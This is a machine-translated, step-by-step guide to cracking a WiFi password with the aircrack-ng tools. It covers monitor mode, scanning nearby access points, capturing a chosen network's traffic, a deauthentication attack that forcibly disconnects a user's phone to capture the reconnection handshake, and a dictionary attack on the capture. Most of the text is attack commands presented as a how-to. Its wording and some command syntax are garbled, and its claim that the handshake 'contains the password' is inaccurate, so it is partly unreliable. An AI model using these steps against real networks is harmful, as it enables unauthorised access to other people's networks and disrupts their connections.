1. Closing the impact process
airmon-ng Check Kill
The wireless card that will enter the listening mode disconnects the AP to which it is connected
2. Check the name of the wireless card
Ifconfig , such as Wlan0
3. Enter the Listening mode:
airmon-ng start Wlan0
Start success, after ifconfig found a mon0
4. Scan Accessory WiFi
airodump-ng mon0
After scanning, the terminal shows as 2 parts, press SPACEBAR to start/stop dynamic refresh, ' A ' key can adjust the display view, the upper and lower arrow keys can be selected a row for easy viewing. In the default view, the top half is the AP that is scanned and its properties, such as signal strength, channel, Bssid,essid, and so on, and the lower half shows which machines (corresponding to the State bar, which is its Mac) are connected to the AP (corresponding to Essid).
5. Monitor the specified AP
execute the following command to stop the scan and stop the command for step 4 , because the scan will constantly switch channel, while listening on an AP, the channel of the AP is fixed.
airodump-ng--bssid AP ' s mac-c channel -W capfile mon0
--BSSID: Specifies which AP to listen to (specified by AP's Mac)
-C: Specify the channel for this AP
-W: Captured package saved to file Capfile
Note the selected APS:
1. Step 4 in the lower part of the bssid and state to have a Mac, meaning to detect a WiFi bssid, and this wifi is connected by one or more machines (the State bar indicates its Mac), step 6 explains why this is selected.
6. Force the re-connection so that the handshake packet appears
Aireplay-ng-0 2 -a AP 's Bssid -c phone' s Mac Mon0
| | | |___ connected to the Mac of this WiFi phone
| | |______________wifi's BSSID
| number of |______________________ attacks
|_________________________ Attack method
The attack causes the phone and WiFi to be disconnected.
1. Why grab a handshake bag?
The handshake package contains the password information.
2. Handshake process:
Suppose my phone goes to Wi-Fi, and for the first time you will definitely be asked to enter your password.
Mobile: I want to connect your WiFi
WiFi: your password
Mobile: This is my password.
WiFi: check password, correct, establish connection, error, roll.
For a password-verified phone and WiFi, they set up a connection after the exchange of data is just some Internet data, scratching them useless, to catch the handshake package containing the password, how to let a verified password of the connection once again the handshake packet? The quickest way is to kick the phone off the line, and then the phone will automatically re-connect, or use the mobile phone to find the phone off the network, he will go to connect, then the handshake package appears. This is why you have to select a machine connected to the WiFi to listen.
It will soon appear at the end of step 5 The end of the first line of the Catch handshake packet. If not present, repeat the attack in a few minutes.
7. Running a dictionary
Aircrack-ng capfile.cap-w Passwd.lst
Aircack-ng Grab Handshake package